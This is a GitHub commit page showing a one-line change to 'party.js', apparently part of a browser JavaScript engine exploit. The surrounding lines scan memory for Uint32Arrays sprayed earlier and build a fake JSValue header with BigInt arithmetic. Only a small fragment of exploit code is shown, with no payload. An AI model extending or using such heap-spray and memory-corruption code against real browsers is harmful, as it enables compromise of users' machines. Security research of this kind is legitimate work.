Skip to content
This repository has been archived by the owner on Dec 27, 2023. It is now read-only.

Commit

Permalink
Oops, it was just not named right.
Browse files Browse the repository at this point in the history
  • Loading branch information
0vercl0k committed Nov 22, 2019
1 parent 29d136c commit 4fd086b
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions party.js
Expand Up @@ -129,6 +129,7 @@ function main(LoadedFromBrowser) {
// Scan for one of the Uint32Array we sprayed earlier.
//

let Biggie2AdjacentSize = null;
const JSValueArraySize = 0xfffa000000000000n | BigInt(ArraySize);
for(let Idx = 0; Idx < 0x100; Idx++) {
const Qword = BigInt(Biggie[Idx]) << 32n | BigInt(Biggie[Idx + 1]);
Expand Down

0 comments on commit 4fd086b

Please sign in to comment.